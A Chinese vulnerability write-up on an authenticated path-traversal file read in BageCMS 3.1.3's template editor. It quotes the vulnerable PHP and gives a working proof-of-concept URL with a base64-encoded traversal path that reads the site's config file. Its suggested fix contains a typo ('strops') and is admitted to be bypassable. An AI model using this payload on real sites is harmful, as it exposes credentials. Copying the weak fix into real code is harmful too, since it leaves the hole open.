bagecms V3.1.3 后台任意文件读取漏洞
作者:互联网
漏洞简介:
BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。 BageCMS 3.1.3版本中的模板
管理功能过滤不严导致任意文件读取漏洞。
漏洞分析:
在文件 www\protected\modules\admini\controllers\TemplateController.php 第100行
actionUpdateTpl 函数部分出现漏洞。
这里看到 filename 是 通过 CHtml::encode(trim( $this->_gets->getParam( 'filename' )));
看一下逻辑,就说从filename参数获取值之后,用trim过滤空格,然后再用 CHtml::encode 函数过
滤。 CHtml::encode 定义在 www/framework/yiilite.php 文件 第 4696行。
public function actionUpdateTpl( $filename ) { parent::_acl(); parent::_configParams(array('action'=>'allowTplOperate', 'val'=>'Y', 'message'=>'不允许创建或编辑模板,请在 protected/config/params.php 中配置 allowTplOperate 为 Y')); $filename = CHtml::encode(trim( $this->_gets->getParam( 'filename' ))); $content = trim( $this->_gets->getParam( 'content' ) ); if ( isset( $_POST['content'] ) ) { $fileputcontent = file_put_contents( $this- >_themePath.DS.'views'.DS.XUtils::b64decode( $filename ), $content ); if ( $fileputcontent == true ) { AdminLogger::_create( array( 'catalog'=>'update', 'intro'=>'编辑模板' ) ); $this->redirect( array ( 'index' ) ); } } $ data['filename'] = XUtils::b64decode( $filename ); $data['content'] = htmlspecialchars( file_get_contents( $this- >_themePath.DS.'views'.DS.XUtils::b64decode( $filename ) ) ); $this->render( 'update', $data ); }
关注$filename,先是对传过来的filename变量做了去空格处理,继续跟踪到CHtml类中的encode方法
class CHtml { const ID_PREFIX='yt'; public static $errorSummaryCss='errorSummary'; public static $errorMessageCss='errorMessage'; public static $errorCss='error'; public static $errorContainerTag='div'; public static $requiredCss='required'; public static $beforeRequiredLabel=''; public static $afterRequiredLabel=' <span class="required">*</span>'; public static $count=0; public static $liveEvents=true; public static $closeSingleTags=true;
public static $renderSpecialAttributesValue=true;
private static $_modelNameConverter;
public static function encode($text)
{
return htmlspecialchars($text,ENT_QUOTES,Yii::app()->charset);
}
通过上面的代码我们可以发现,并没有对file参数进行防止任意文件读取的过滤,只是加了htmlspecialchars防止xss的过滤。
看一下读取文件内容函数,
$data['content'] = htmlspecialchars( file_get_contents( $this- >_themePath.DS.'views'.DS.XUtils::b64decode( $filename ) ) )
漏洞证明:
用管理员账号登录网站后台,访问url,这里filename 我们构造为
../../../protected/config/main.php 的 base64编码后的值
Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA== ,来读取网站的config配置文件。
url: http://localhost/index.php?
r=admini/template/updateTpl&filename=Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA
==
漏洞修复:
base64解码后对文件名加一个过滤
strops($filename,'../')===false但是在Windows下还可以用..\
来跳转目录
可以在php.ini配置open_basedir限定文件访问范围
标签:V3.1,读取,DS,filename,content,static,encode,bagecms,public 来源: https://www.cnblogs.com/akger/p/15188969.html